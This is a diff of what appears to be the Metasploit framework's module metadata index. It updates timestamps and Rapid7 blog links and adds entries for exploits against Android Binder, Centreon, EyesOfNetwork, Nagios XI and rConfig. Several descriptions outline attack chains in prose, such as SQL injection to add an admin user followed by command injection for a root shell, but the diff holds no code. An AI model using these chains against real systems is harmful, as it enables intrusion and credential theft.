@@ -29608,7 +29390,7 @@

    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/auxiliary/scanner/http/smt_ipmi_static_cert_scanner.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/smt_ipmi_static_cert_scanner",
@@ -29634,7 +29416,7 @@
    ],
    "description": "This module abuses a directory traversal vulnerability in the url_redirect.cgi application\n        accessible through the web interface of Supermicro Onboard IPMI controllers.  The vulnerability\n        is present due to a lack of sanitization of the url_name parameter. This allows an attacker with\n        a valid, but not necessarily administrator-level account, to access the contents of any file\n        on the system. This includes the /nv/PSBlock file, which contains the cleartext credentials for\n        all configured accounts. This module has been tested on a Supermicro Onboard IPMI (X9SCL/X9SCM)\n        with firmware version SMT_X9_214. Other file names to try include /PSStore, /PMConfig.dat, and\n        /wsman/simple_auth.passwd",
    "references": [
-      "URL-https://community.rapid7.com/community/metasploit/blog/2013/11/06/supermicro-ipmi-firmware-vulnerabilities",
+      "URL-https://blog.rapid7.com/2013/11/06/supermicro-ipmi-firmware-vulnerabilities",
      "URL-https://github.com/zenfish/ipmi/blob/master/dump_SM.py"
    ],
    "platform": "",
@@ -29656,7 +29438,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/auxiliary/scanner/http/smt_ipmi_url_redirect_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/smt_ipmi_url_redirect_traversal",
@@ -32427,7 +32209,7 @@
    "description": "This module exploits a hardcoded user and password for the GetFile maintenance\n        task in Novell ZENworks Asset Management 7.5. The vulnerability exists in the Web\n        Console and can be triggered by sending a specially crafted request to the rtrlet component,\n        allowing a remote unauthenticated user to retrieve a maximum of 100_000_000 KB of\n        remote files. This module has been successfully tested on Novell ZENworks Asset\n        Management 7.5.",
    "references": [
      "CVE-2012-4933",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2012/10/11/cve-2012-4933-novell-zenworks"
+      "URL-https://blog.rapid7.com/2012/10/11/cve-2012-4933-novell-zenworks"
    ],
    "platform": "",
    "arch": "",
@@ -32448,7 +32230,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/auxiliary/scanner/http/zenworks_assetmanagement_fileaccess.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/zenworks_assetmanagement_fileaccess",
@@ -32474,7 +32256,7 @@
    "description": "This module exploits a hardcoded user and password for the GetConfig maintenance\n        task in Novell ZENworks Asset Management 7.5. The vulnerability exists in the Web\n        Console and can be triggered by sending a specially crafted request to the rtrlet component,\n        allowing a remote unauthenticated user to retrieve the configuration parameters of\n        Novell Zenworks Asset Managment, including the database credentials in clear text.\n        This module has been successfully tested on Novell ZENworks Asset Management 7.5.",
    "references": [
      "CVE-2012-4933",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2012/10/11/cve-2012-4933-novell-zenworks"
+      "URL-https://blog.rapid7.com/2012/10/11/cve-2012-4933-novell-zenworks"
    ],
    "platform": "",
    "arch": "",
@@ -32495,7 +32277,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2017-08-26 21:01:10 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/auxiliary/scanner/http/zenworks_assetmanagement_getconfig.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/zenworks_assetmanagement_getconfig",
@@ -34252,7 +34034,7 @@
      "sybase"
    ],
    "targets": null,
-    "mod_time": "2019-06-27 17:06:32 +0000",
+    "mod_time": "2020-02-08 15:31:27 +0000",
    "path": "/modules/auxiliary/scanner/mssql/mssql_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/mssql/mssql_login",
@@ -34370,7 +34152,7 @@
    "references": [
      "CVE-2012-2122",
      "OSVDB-82804",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysql"
+      "URL-https://blog.rapid7.com/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysql"
    ],
    "platform": "",
    "arch": "",
@@ -34382,7 +34164,7 @@

    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/auxiliary/scanner/mysql/mysql_authbypass_hashdump.rb",
    "is_install_path": true,
    "ref_name": "scanner/mysql/mysql_authbypass_hashdump",
@@ -34494,7 +34276,7 @@

    ],
    "targets": null,
-    "mod_time": "2019-06-27 17:06:32 +0000",
+    "mod_time": "2020-02-08 15:31:27 +0000",
    "path": "/modules/auxiliary/scanner/mysql/mysql_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/mysql/mysql_login",
@@ -35614,7 +35396,7 @@
      "Patrik Karlsson <patrik@cqure.net>",
      "todb <todb@metasploit.com>"
    ],
-    "description": "This module attempts to authenticate against an Oracle RDBMS\n        instance using username and password combinations indicated\n        by the USER_FILE, PASS_FILE, and USERPASS_FILE options.",
+    "description": "This module attempts to authenticate against an Oracle RDBMS\n        instance using username and password combinations indicated\n        by the USER_FILE, PASS_FILE, and USERPASS_FILE options.\n\n        Due to a bug in nmap versions 6.50-7.80 may not work.",
    "references": [
      "URL-http://www.oracle.com/us/products/database/index.html",
      "CVE-1999-0502",
@@ -35630,7 +35412,7 @@

    ],
    "targets": null,
-    "mod_time": "2019-10-05 14:13:38 +0000",
+    "mod_time": "2020-02-21 08:41:42 +0000",
    "path": "/modules/auxiliary/scanner/oracle/oracle_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/oracle/oracle_login",
@@ -36959,7 +36741,7 @@
      "zerosum0x0",
      "Tom Sellers"
    ],
-    "description": "This module checks a range of hosts for the CVE-2019-0708 vulnerability\n        by binding the MS_T120 channel outside of its normal slot and sending\n        non-DoS packets which respond differently on patched and vulnerable hosts.\n        It can optionally trigger the DoS vulnerability.",
+    "description": "This module checks a range of hosts for the CVE-2019-0708 vulnerability\n          by binding the MS_T120 channel outside of its normal slot and sending\n          non-DoS packets which respond differently on patched and vulnerable hosts.\n          It can optionally trigger the DoS vulnerability.",
    "references": [
      "CVE-2019-0708",
      "URL-https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708",
@@ -36975,7 +36757,7 @@

    ],
    "targets": null,
-    "mod_time": "2019-11-11 17:33:10 +0000",
+    "mod_time": "2020-03-05 14:48:37 +0000",
    "path": "/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb",
    "is_install_path": true,
    "ref_name": "scanner/rdp/cve_2019_0708_bluekeep",
@@ -39959,7 +39741,7 @@
      "microsoft-ds"
    ],
    "targets": null,
-    "mod_time": "2019-05-22 13:00:09 +0000",
+    "mod_time": "2020-02-26 12:17:59 +0000",
    "path": "/modules/auxiliary/scanner/smb/pipe_auditor.rb",
    "is_install_path": true,
    "ref_name": "scanner/smb/pipe_auditor",
@@ -40239,7 +40021,7 @@
      "microsoft-ds"
    ],
    "targets": null,
-    "mod_time": "2019-03-05 03:38:51 +0000",
+    "mod_time": "2020-02-13 11:56:12 +0000",
    "path": "/modules/auxiliary/scanner/smb/smb_enumusers.rb",
    "is_install_path": true,
    "ref_name": "scanner/smb/smb_enumusers",
@@ -40321,7 +40103,7 @@
      "microsoft-ds"
    ],
    "targets": null,
-    "mod_time": "2019-06-27 17:06:32 +0000",
+    "mod_time": "2020-03-02 11:50:19 +0000",
    "path": "/modules/auxiliary/scanner/smb/smb_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/smb/smb_login",
@@ -40738,7 +40520,7 @@
    "description": "This module will extract WEP keys and WPA preshared keys from\n        Arris DG950A cable modems.",
    "references": [
      "CVE-2014-4863",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2014/08/21/more-snmp-information-leaks-cve-2014-4862-and-cve-2014-4863"
+      "URL-https://blog.rapid7.com/2014/08/21/more-snmp-information-leaks-cve-2014-4862-and-cve-2014-4863"
    ],
    "platform": "",
    "arch": "",
@@ -40750,7 +40532,7 @@

    ],
    "targets": null,
-    "mod_time": "2018-07-09 12:56:00 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/auxiliary/scanner/snmp/arris_dg950.rb",
    "is_install_path": true,
    "ref_name": "scanner/snmp/arris_dg950",
@@ -40775,7 +40557,7 @@
    ],
    "description": "This module extracts password hashes from certain Brocade load\n        balancer devices.",
    "references": [
-      "URL-https://community.rapid7.com/community/metasploit/blog/2014/05/15/r7-2014-01-r7-2014-02-r7-2014-03-disclosures-exposure-of-critical-information-via-snmp-public-community-string"
+      "URL-https://blog.rapid7.com/2014/05/15/r7-2014-01-r7-2014-02-r7-2014-03-disclosures-exposure-of-critical-information-via-snmp-public-community-string"
    ],
    "platform": "",
    "arch": "",
@@ -40787,7 +40569,7 @@

    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/auxiliary/scanner/snmp/brocade_enumhash.rb",
    "is_install_path": true,
    "ref_name": "scanner/snmp/brocade_enumhash",
@@ -40965,7 +40747,7 @@
    ],
    "description": "This module extracts WEP keys and WPA preshared keys from\n        certain Netopia cable modems.",
    "references": [
-      "URL-https://community.rapid7.com/community/metasploit/blog/2014/05/15/r7-2014-01-r7-2014-02-r7-2014-03-disclosures-exposure-of-critical-information-via-snmp-public-community-string"
+      "URL-https://blog.rapid7.com/2014/05/15/r7-2014-01-r7-2014-02-r7-2014-03-disclosures-exposure-of-critical-information-via-snmp-public-community-string"
    ],
    "platform": "",
    "arch": "",
@@ -40977,7 +40759,7 @@

    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/auxiliary/scanner/snmp/netopia_enum.rb",
    "is_install_path": true,
    "ref_name": "scanner/snmp/netopia_enum",
@@ -41271,7 +41053,7 @@
    ],
    "description": "This module will extract WEP keys and WPA preshared keys from\n        certain Ubee cable modems.",
    "references": [
-      "URL-https://community.rapid7.com/community/metasploit/blog/2014/05/15/r7-2014-01-r7-2014-02-r7-2014-03-disclosures-exposure-of-critical-information-via-snmp-public-community-string"
+      "URL-https://blog.rapid7.com/2014/05/15/r7-2014-01-r7-2014-02-r7-2014-03-disclosures-exposure-of-critical-information-via-snmp-public-community-string"
    ],
    "platform": "",
    "arch": "",
@@ -41283,7 +41065,7 @@

    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/auxiliary/scanner/snmp/ubee_ddw3611.rb",
    "is_install_path": true,
    "ref_name": "scanner/snmp/ubee_ddw3611",
@@ -41543,7 +41325,7 @@
    "description": "This module scans for the Juniper SSH backdoor (also valid on Telnet).\n        Any username is required, and the password is <<< %s(un='%s') = %u.",
    "references": [
      "CVE-2015-7755",
-      "URL-https://community.rapid7.com/community/infosec/blog/2015/12/20/cve-2015-7755-juniper-screenos-authentication-backdoor",
+      "URL-https://blog.rapid7.com/2015/12/20/cve-2015-7755-juniper-screenos-authentication-backdoor",
      "URL-https://kb.juniper.net/InfoCenter/index?page=content&id=JSA10713"
    ],
    "platform": "",
@@ -41556,7 +41338,7 @@

    ],
    "targets": null,
-    "mod_time": "2018-08-15 06:48:35 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/auxiliary/scanner/ssh/juniper_backdoor.rb",
    "is_install_path": true,
    "ref_name": "scanner/ssh/juniper_backdoor",
@@ -42285,7 +42067,7 @@
      "BID-51182",
      "CVE-2011-4862",
      "EDB-18280",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2011/12/28/more-fun-with-bsd-derived-telnet-daemons"
+      "URL-https://blog.rapid7.com/2011/12/28/more-fun-with-bsd-derived-telnet-daemons"
    ],
    "platform": "",
    "arch": "",
@@ -42297,7 +42079,7 @@
      "telnet"
    ],
    "targets": null,
-    "mod_time": "2018-02-14 09:19:28 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/auxiliary/scanner/telnet/telnet_encrypt_overflow.rb",
    "is_install_path": true,
    "ref_name": "scanner/telnet/telnet_encrypt_overflow",
@@ -44094,7 +43876,7 @@
    ],
    "description": "This module will automatically serve browser exploits. Here are the options you can\n        configure:\n\n        The INCLUDE_PATTERN option allows you to specify the kind of exploits to be loaded. For example,\n        if you wish to load just Adobe Flash exploits, then you can set Include to 'adobe_flash'.\n\n        The EXCLUDE_PATTERN option will ignore exploits. For example, if you don't want any Adobe Flash\n        exploits, you can set this. Also note that the Exclude option will always be evaluated\n        after the Include option.\n\n        The MaxExploitCount option specifies the max number of exploits to load by Browser Autopwn.\n        By default, 20 will be loaded. But note that the client will probably not be vulnerable\n        to all 20 of them, so only some will actually be served to the client.\n\n        The HTMLContent option allows you to provide a basic webpage. This is what the user behind\n        the vulnerable browser will see. You can simply set a string, or you can do the file://\n        syntax to load an HTML file. Note this option might break exploits so try to keep it\n        as simple as possible.\n\n        The MaxSessionCount option is used to limit how many sessions Browser Autopwn is allowed to\n        get. The default -1 means unlimited. Combining this with other options such as RealList\n        and Custom404, you can get information about which visitors (IPs) clicked on your malicious\n        link, what exploits they might be vulnerable to, redirect them to your own internal\n        training website without actually attacking them.\n\n        For more information about Browser Autopwn, please see the referenced blog post.",
    "references": [
-      "URL-https://community.rapid7.com/community/metasploit/blog/2015/07/16/the-new-metasploit-browser-autopwn-strikes-faster-and-smarter--part-2"
+      "URL-https://blog.rapid7.com/2015/07/16/the-new-metasploit-browser-autopwn-strikes-faster-and-smarter--part-2"
    ],
    "platform": "",
    "arch": "",
@@ -44106,7 +43888,7 @@

    ],
    "targets": null,
-    "mod_time": "2017-08-26 21:01:10 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/auxiliary/server/browser_autopwn2.rb",
    "is_install_path": true,
    "ref_name": "server/browser_autopwn2",
@@ -45608,7 +45390,7 @@
    "references": [
      "CVE-2014-4877",
      "URL-https://bugzilla.redhat.com/show_bug.cgi?id=1139181",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2014/10/28/r7-2014-15-gnu-wget-ftp-symlink-arbitrary-filesystem-access"
+      "URL-https://blog.rapid7.com/2014/10/28/r7-2014-15-gnu-wget-ftp-symlink-arbitrary-filesystem-access"
    ],
    "platform": "",
    "arch": "",
@@ -45620,7 +45402,7 @@

    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/auxiliary/server/wget_symlink_file_write.rb",
    "is_install_path": true,
    "ref_name": "server/wget_symlink_file_write",
@@ -47256,7 +47038,7 @@
    ],
    "description": "This module emulates a webserver leaking PII data",
    "references": [
-      "URL-https://community.rapid7.com/community/metasploit/blog/2011/06/02/vsploit--virtualizing-exploitation-attributes-with-metasploit-framework"
+      "URL-https://blog.rapid7.com/2011/06/02/vsploit--virtualizing-exploitation-attributes-with-metasploit-framework"
    ],
    "platform": "",
    "arch": "",
@@ -47268,7 +47050,7 @@

    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/auxiliary/vsploit/pii/web_pii.rb",
    "is_install_path": true,
    "ref_name": "vsploit/pii/web_pii",
@@ -49480,6 +49262,52 @@
    },
    "needs_cleanup": null
  },
+  "exploit_android/local/binder_uaf": {
+    "name": "Android Binder Use-After-Free Exploit",
+    "fullname": "exploit/android/local/binder_uaf",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2019-09-26",
+    "type": "exploit",
+    "author": [
+      "Jann Horn",
+      "Maddie Stone",
+      "grant-h",
+      "timwr"
+    ],
+    "description": "This module exploits CVE-2019-2215, which is a use-after-free in Binder in the\n          Android kernel. The bug is a local privilege escalation vulnerability that\n          allows for a full compromise of a vulnerable device. If chained with a browser\n          renderer exploit, this bug could fully compromise a device through a malicious\n          website.\n          The freed memory is replaced with an iovec structure in order to leak a pointer\n          to the task_struct. Finally the bug is triggered again in order to overwrite\n          the addr_limit, making all memory (including kernel memory) accessible as part\n          of the user-space memory range in our process and allowing arbitrary reading\n          and writing of kernel memory.",
+    "references": [
+      "CVE-2019-2215",
+      "URL-https://bugs.chromium.org/p/project-zero/issues/detail?id=1942",
+      "URL-https://googleprojectzero.blogspot.com/2019/11/bad-binder-android-in-wild-exploit.html",
+      "URL-https://hernan.de/blog/2019/10/15/tailoring-cve-2019-2215-to-achieve-root/",
+      "URL-https://github.com/grant-h/qu1ckr00t/blob/master/native/poc.c"
+    ],
+    "platform": "Android,Linux",
+    "arch": "aarch64",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Auto"
+    ],
+    "mod_time": "2020-02-29 11:22:59 +0000",
+    "path": "/modules/exploits/android/local/binder_uaf.rb",
+    "is_install_path": true,
+    "ref_name": "android/local/binder_uaf",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": true
+  },
  "exploit_android/local/futex_requeue": {
    "name": "Android 'Towelroot' Futex Requeue Kernel Exploit",
    "fullname": "exploit/android/local/futex_requeue",
@@ -49914,7 +49742,7 @@
      "Cliff Stoll",
      "wvu <wvu@metasploit.com>"
    ],
-    "description": "This module exploits a stack buffer overflow in fingerd on 4.3BSD.\n        This vulnerability was exploited by the Morris worm in 1988-11-02.\n        Cliff Stoll reports on the worm in the epilogue of The Cuckoo's Egg.",
+    "description": "This module exploits a stack buffer overflow in fingerd on 4.3BSD.\n\n        This vulnerability was exploited by the Morris worm in 1988-11-02.\n        Cliff Stoll reports on the worm in the epilogue of The Cuckoo's Egg.\n\n        Currently, only bsd/vax/shell_reverse_tcp is supported.",
    "references": [
      "URL-https://en.wikipedia.org/wiki/Morris_worm",
      "URL-https://spaf.cerias.purdue.edu/tech-reps/823.pdf",
@@ -49934,7 +49762,7 @@
    "targets": [
      "@(#)fingerd.c   5.1 (Berkeley) 6/6/85"
    ],
-    "mod_time": "2019-12-23 19:02:13 +0000",
+    "mod_time": "2020-02-05 17:21:47 +0000",
    "path": "/modules/exploits/bsd/finger/morris_fingerd_bof.rb",
    "is_install_path": true,
    "ref_name": "bsd/finger/morris_fingerd_bof",
@@ -50923,7 +50751,7 @@
      "CWE-94",
      "OSVDB-112004",
      "EDB-34765",
-      "URL-https://community.rapid7.com/community/infosec/blog/2015/12/01/r7-2015-25-advantech-eki-multiple-known-vulnerabilities",
+      "URL-https://blog.rapid7.com/2015/12/01/r7-2015-25-advantech-eki-multiple-known-vulnerabilities",
      "URL-https://access.redhat.com/articles/1200223",
      "URL-https://seclists.org/oss-sec/2014/q3/649"
    ],
@@ -50948,7 +50776,7 @@
    "targets": [
      "Automatic Targeting"
    ],
-    "mod_time": "2018-09-17 22:29:20 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/exploits/linux/http/advantech_switch_bash_env_exec.rb",
    "is_install_path": true,
    "ref_name": "linux/http/advantech_switch_bash_env_exec",
@@ -51590,6 +51418,67 @@
    },
    "needs_cleanup": true
  },
+  "exploit_linux/http/centreon_pollers_auth_rce": {
+    "name": "Centreon Poller Authenticated Remote Command Execution",
+    "fullname": "exploit/linux/http/centreon_pollers_auth_rce",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2020-01-27",
+    "type": "exploit",
+    "author": [
+      "Omri Baso",
+      "Fabien Aunay",
+      "mekhalleh (RAMELLA Sébastien)"
+    ],
+    "description": "An authenticated user with sufficient administrative rights to manage pollers can use this functionality to\n        execute arbitrary commands remotely. Usually, the miscellaneous commands are used by the additional modules\n        (to perform certain actions), by the scheduler for data processing, etc.\n\n        This module uses this functionality to obtain a remote shell on the target.",
+    "references": [
+      "EDB-47977"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd, x64",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Reverse shell (In-Memory)",
+      "Meterpreter (Dropper)"
+    ],
+    "mod_time": "2020-03-17 12:15:06 +0000",
+    "path": "/modules/exploits/linux/http/centreon_pollers_auth_rce.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/centreon_pollers_auth_rce",
+    "check": false,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
+      ]
+    },
+    "needs_cleanup": null
+  },
  "exploit_linux/http/centreon_sqli_exec": {
    "name": "Centreon SQL and Command Injection",
    "fullname": "exploit/linux/http/centreon_sqli_exec",
@@ -53610,6 +53499,60 @@
    },
    "needs_cleanup": null
  },
+  "exploit_linux/http/eyesofnetwork_autodiscovery_rce": {
+    "name": "EyesOfNetwork AutoDiscovery Target Command Execution",
+    "fullname": "exploit/linux/http/eyesofnetwork_autodiscovery_rce",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2020-02-06",
+    "type": "exploit",
+    "author": [
+      "Clément Billac",
+      "bcoles <bcoles@gmail.com>",
+      "Erik Wynter"
+    ],
+    "description": "This module exploits multiple vulnerabilities in EyesOfNetwork version 5.3\n        and prior in order to execute arbitrary commands as root.\n\n        This module takes advantage of a command injection vulnerability in the\n        `target` parameter of the AutoDiscovery functionality within the EON web\n        interface in order to write an Nmap NSE script containing the payload to\n        disk. It then starts an Nmap scan to activate the payload. This results in\n        privilege escalation because the`apache` user can execute Nmap as root.\n\n        Valid credentials for a user with administrative privileges are required.\n        However, this module can bypass authentication via two methods, i.e. by\n        generating an API access token based on a hardcoded key, and via SQLI.\n        This module has been successfully tested on EyesOfNetwork 5.3 with API\n        version 2.4.2.",
+    "references": [
+      "CVE-2020-8654",
+      "CVE-2020-8655",
+      "CVE-2020-8656",
+      "CVE-2020-8657",
+      "EDB-48025"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd",
+    "rport": 443,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Auto"
+    ],
+    "mod_time": "2020-03-02 15:10:46 +0000",
+    "path": "/modules/exploits/linux/http/eyesofnetwork_autodiscovery_rce.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/eyesofnetwork_autodiscovery_rce",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": null
+  },
  "exploit_linux/http/f5_icall_cmd": {
    "name": "F5 iControl iCall::Script Root Command Execution",
    "fullname": "exploit/linux/http/f5_icall_cmd",
@@ -54290,7 +54233,7 @@
      "Unix In-Memory",
      "Linux Dropper"
    ],
-    "mod_time": "2019-06-24 13:38:14 +0000",
+    "mod_time": "2020-02-19 01:06:50 +0000",
    "path": "/modules/exploits/linux/http/hp_van_sdn_cmd_inject.rb",
    "is_install_path": true,
    "ref_name": "linux/http/hp_van_sdn_cmd_inject",
@@ -55502,7 +55445,7 @@
      "CVE-2013-0136",
      "OSVDB-93444",
      "US-CERT-VU-701572",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2013/05/15/new-1day-exploits-mutiny-vulnerabilities"
+      "URL-https://blog.rapid7.com/2013/05/15/new-1day-exploits-mutiny-vulnerabilities"
    ],
    "platform": "Linux",
    "arch": "x86",
@@ -55525,7 +55468,7 @@
    "targets": [
      "Mutiny 5.0-1.07 Appliance (Linux)"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/exploits/linux/http/mutiny_frontend_upload.rb",
    "is_install_path": true,
    "ref_name": "linux/http/mutiny_frontend_upload",
@@ -55587,6 +55530,58 @@
    },
    "needs_cleanup": null
  },
+  "exploit_linux/http/nagios_xi_authenticated_rce": {
+    "name": "Nagios XI Authenticated Remote Command Execution",
+    "fullname": "exploit/linux/http/nagios_xi_authenticated_rce",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2019-07-29",
+    "type": "exploit",
+    "author": [
+      "Jak Gibb",
+      "Erik Wynter"
+    ],
+    "description": "This module exploits a vulnerability in Nagios XI before 5.6.6 in\n        order to execute arbitrary commands as root.\n\n        The module uploads a malicious plugin to the Nagios XI server and then\n        executes this plugin by issuing an HTTP GET request to download a\n        system profile from the server. For all supported targets except Linux\n        (cmd), the module uses a command stager to write the exploit to the\n        target via the malicious plugin. This may not work if Nagios XI is\n        running in a restricted Unix environment, so in that case the target\n        must be set to Linux (cmd). The module then writes the payload to the\n        malicious plugin while avoiding commands that may not be supported.\n\n        Valid credentials for a user with administrative privileges are\n        required. This module was successfully tested on Nagios XI 5.6.5\n        running on CentOS 7. The module may behave differently against older\n        versions of Nagios XI. See the documentation for more information.",
+    "references": [
+      "CVE-2019-15949",
+      "URL-https://github.com/jakgibb/nagiosxi-root-rce-exploit"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Linux (x86)",
+      "Linux (x64)",
+      "Linux (cmd)"
+    ],
+    "mod_time": "2020-03-09 11:56:15 +0000",
+    "path": "/modules/exploits/linux/http/nagios_xi_authenticated_rce.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/nagios_xi_authenticated_rce",
+    "check": true,
+    "post_auth": true,
+    "default_credential": true,
+    "notes": {
+    },
+    "needs_cleanup": null
+  },
  "exploit_linux/http/nagios_xi_chained_rce": {
    "name": "Nagios XI Chained Remote Code Execution",
    "fullname": "exploit/linux/http/nagios_xi_chained_rce",
@@ -57236,6 +57231,60 @@
    },
    "needs_cleanup": true
  },
+  "exploit_linux/http/rconfig_ajaxarchivefiles_rce": {
+    "name": "Rconfig 3.x Chained Remote Code Execution",
+    "fullname": "exploit/linux/http/rconfig_ajaxarchivefiles_rce",
+    "aliases": [
+
+    ],
+    "rank": 400,
+    "disclosure_date": "2020-03-11",
+    "type": "exploit",
+    "author": [
+      "Jean-Pascal Thomas",
+      "Orange Cyberdefense"
+    ],
+    "description": "This module exploits multiple vulnerabilities in rConfig version 3.9\n        in order to execute arbitrary commands.\n        This module takes advantage of a command injection vulnerability in the\n        `path` parameter of the ajax archive file functionality within the rConfig web\n        interface in order to execute the payload.\n        Valid credentials for a user with administrative privileges are required.\n        However, this module can bypass authentication via SQLI.\n        This module has been successfully tested on Rconfig 3.9.3 and 3.9.4.\n        The steps are:\n          1. SQLi on /commands.inc.php allows us to add an administrative user.\n          2. An authenticated session is established with the newly added user\n          3. Command Injection on /lib/ajaxHandlers/ajaxArchiveFiles.php allows us to\n             execute the payload.\n          4. Remove the added admin user.\n        Tips : once you get a shell, look at the CVE-2019-19585.\n        You will probably get root because rConfig install script add Apache user to\n        sudoers with nopasswd ;-)",
+    "references": [
+      "CVE-2019-19509",
+      "CVE-2020-10220",
+      "EDB-47982",
+      "EDB-48208",
+      "URL-https://github.com/v1k1ngfr/exploits-rconfig/blob/master/rconfig_CVE-2019-19509.py",
+      "URL-https://github.com/v1k1ngfr/exploits-rconfig/blob/master/rconfig_CVE-2020-10220.py"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd",
+    "rport": 443,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Auto"
+    ],
+    "mod_time": "2020-03-13 10:42:40 +0000",
+    "path": "/modules/exploits/linux/http/rconfig_ajaxarchivefiles_rce.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/rconfig_ajaxarchivefiles_rce",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": null
+  },
  "exploit_linux/http/realtek_miniigd_upnp_exec_noauth": {
    "name": "Realtek SDK Miniigd UPnP SOAP Command Execution",
    "fullname": "exploit/linux/http/realtek_miniigd_upnp_exec_noauth",
@@ -57459,7 +57508,7 @@
    "description": "This module exploits a buffer overflow on the Supermicro Onboard IPMI controller web\n        interface. The vulnerability exists on the close_window.cgi CGI application, and is due\n        to the insecure usage of strcpy. In order to get a session, the module will execute\n        system() from libc with an arbitrary CMD payload sent on the User-Agent header. This\n        module has been tested successfully on Supermicro Onboard IPMI (X9SCL/X9SCM) with firmware\n        SMT_X9_214.",
    "references": [
      "CVE-2013-3623",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2013/11/06/supermicro-ipmi-firmware-vulnerabilities"
+      "URL-https://blog.rapid7.com/2013/11/06/supermicro-ipmi-firmware-vulnerabilities"
    ],
    "platform": "Unix",
    "arch": "cmd",
@@ -57482,7 +57531,7 @@
    "targets": [
      "Supermicro Onboard IPMI (X9SCL/X9SCM) with firmware SMT_X9_214"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
